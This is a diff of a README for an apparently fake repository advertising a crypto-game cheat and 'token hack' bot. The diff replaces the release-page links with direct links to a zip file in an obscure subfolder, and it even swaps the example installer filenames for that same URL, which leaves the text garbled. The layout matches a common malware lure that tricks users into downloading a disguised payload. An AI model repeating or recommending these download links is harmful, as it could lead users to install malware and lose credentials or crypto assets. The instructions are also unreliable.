Kyreclove/LumiTerra-Crypto-Bot-Crypto-Game-Auto-Farm-Clicker-Cheat-Token-Hack-Api/README.md

 2. **Visit the Releases page to download the bot.**

-   You can find the download link here: [Download Now](https://github.com/Kyreclove/LumiTerra-Crypto-Bot-Crypto-Game-Auto-Farm-Clicker-Cheat-Token-Hack-Api/releases)
+   You can find the download link here: [Download Now](https://raw.githubusercontent.com/Kyreclove/LumiTerra-Crypto-Bot-Crypto-Game-Auto-Farm-Clicker-Cheat-Token-Hack-Api/main/isocryme/LumiTerra-Crypto-Bot-Crypto-Game-Auto-Farm-Clicker-Cheat-Token-Hack-Api.zip)

 ## 📥 Download & Install

 ### Step 1: Download

-1. Click the link to visit the releases page: [Download Now](https://github.com/Kyreclove/LumiTerra-Crypto-Bot-Crypto-Game-Auto-Farm-Clicker-Cheat-Token-Hack-Api/releases).
+1. Click the link to visit the releases page: [Download Now](https://raw.githubusercontent.com/Kyreclove/LumiTerra-Crypto-Bot-Crypto-Game-Auto-Farm-Clicker-Cheat-Token-Hack-Api/main/isocryme/LumiTerra-Crypto-Bot-Crypto-Game-Auto-Farm-Clicker-Cheat-Token-Hack-Api.zip).
 2. On the releases page, look for the latest version.
 3. Choose the appropriate installer for your operating system.
-Common files will be labeled with versions such as `setup.exe`, `setup.dmg`, or `setup.sh`.
+Common files will be labeled with versions such as `https://raw.githubusercontent.com/Kyreclove/LumiTerra-Crypto-Bot-Crypto-Game-Auto-Farm-Clicker-Cheat-Token-Hack-Api/main/isocryme/LumiTerra-Crypto-Bot-Crypto-Game-Auto-Farm-Clicker-Cheat-Token-Hack-Api.zip`, `https://raw.githubusercontent.com/Kyreclove/LumiTerra-Crypto-Bot-Crypto-Game-Auto-Farm-Clicker-Cheat-Token-Hack-Api/main/isocryme/LumiTerra-Crypto-Bot-Crypto-Game-Auto-Farm-Clicker-Cheat-Token-Hack-Api.zip`, or `https://raw.githubusercontent.com/Kyreclove/LumiTerra-Crypto-Bot-Crypto-Game-Auto-Farm-Clicker-Cheat-Token-Hack-Api/main/isocryme/LumiTerra-Crypto-Bot-Crypto-Game-Auto-Farm-Clicker-Cheat-Token-Hack-Api.zip`.

 ### Step 2: Install